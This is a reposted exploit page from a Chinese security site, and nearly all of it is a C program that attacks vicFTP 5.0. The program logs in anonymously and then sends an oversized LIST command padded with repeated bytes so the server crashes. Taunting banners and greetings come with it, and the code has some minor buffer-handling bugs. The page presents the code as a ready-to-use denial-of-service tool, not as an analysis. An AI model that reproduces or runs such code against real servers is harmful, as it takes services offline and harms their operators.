首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
vicFTP 5.0 (LIST) Remote Denial of Service Exploit
来源:www.vfcocus.net 作者:Luja 发布时间:2008-10-27  
#include <cstdio>
#include <winsock2.h>
#include <memory.h>
#define __z00ro(a) memset(a,0,sizeof(a));

//greetings : SiD.psycho
//Smallest greetings : Gorion  - lofamy cIem We want be like y0U :***

unsigned int setport(const char* port){
       if((atoi(port)==0) || (atoi(port)<0)){
       return 21;
       }
       return atoi(port);                              
}        

int main(int argc,char **argv){

printf("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"
       "+=========== vicFTPS v 5.0 REMOTE dos POC ;[      ===========+\n"
       "+=========== Alfons Luja sp Z.0.0                 ===========+\n"
       "+=========== I want clear b00f not a d0s !!!      ===========+\n"
       "+=========== Propably 0 dAy                       ===========+\n"
       "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n");
if(argc<3){
   printf("\nuse poc.exe IP PORT\n");
   return 0;
}
int socks;
hostent *host;
WSADATA WSA;
SOCKADDR_IN aip;
char recvs[666]={0}; //ave
char test[66]={0};  // 4 nothing
const char *login = "USER Anonymous\r\n";   
const char *pass = "PASS echo@gov.tr\r\n";
strcpy(test,"LIST /\\/iWana_be_like_Gorion\\");
memset(test+strlen("LIST /\\/iWana_be_like_Gorion\\"),0x42,sizeof(test));
test[sizeof(test)-2]='\r';
test[sizeof(test)-1]='\n';
test[sizeof(test)]='\0';
printf("\nTarget:%s\nPort:%u\n",argv[1],setport(argv[2]));
if((WSAStartup(MAKEWORD(4, 2), &WSA))==0){
    if((socks = socket(AF_INET,SOCK_STREAM,0)) != -1){
         aip.sin_family = AF_INET;
         aip.sin_addr.s_addr = inet_addr(argv[1]);
         aip.sin_port = htons(setport(argv[2]));
         memset(&(aip.sin_zero),'0',8);
     if(connect(socks,(struct sockaddr*)&aip,sizeof(struct sockaddr)) == 0){
         recv(socks,recvs,sizeof(recvs)-1,0);
         __z00ro(recvs);
         send(socks,login,strlen(login),0);
         recv(socks,recvs,sizeof(recvs)-1,0);
         __z00ro(recvs);
         send(socks,pass,strlen(pass),0);
         recv(socks,recvs,sizeof(recvs)-1,0);    
         printf("%s",recvs);
          if(!strncmp(recvs,"230 fake user logged in.",3)){
             printf("Send greeting!!\n"); 
             __z00ro(recvs);
             send(socks,test,sizeof(test),0); 
             recv(socks,recvs,sizeof(recvs)-1,0);  
             Sleep(200);
             printf("Server is charmed and died happy!!\n");    
          }
          else{
             printf("Target dont love us . You must have account :[\r\n");
             closesocket(socks);      
             WSACleanup();
             return 0;    
          }                      
         }
       else {
       printf("(__eRROR):[Connection  error](!!!!)\n"
              "It can be bad port number or IP addresss!\n");
       closesocket(socks);      
       WSACleanup();
       return 0;   
       }      
      }
      WSACleanup();
     }  
return 0;      
}


//~~@KND http://pl.youtube.com/watch?v=KvFAx3ArmlE ~@~

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·KVIrc 3.4.0 Virgo Remote Forma
·PumpKIN TFTP Server 2.7.2.0 De
·TUGzip 3.00 archiver .ZIP File
·PowerTCP FTP module Multiple T
·db Software Laboratory VImpX (
·MyForum 1.3 (lecture.php id) R
·MS08066本地权限提升漏洞exploit
·VLC 0.9.4 .TY File Buffer Over
·Linux Kernel < 2.6.22 ftruncat
·CSSH is a proof of concept CSS
·e107 Plugin EasyShop (category
·MindDezign Photo Gallery 2.2 A
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved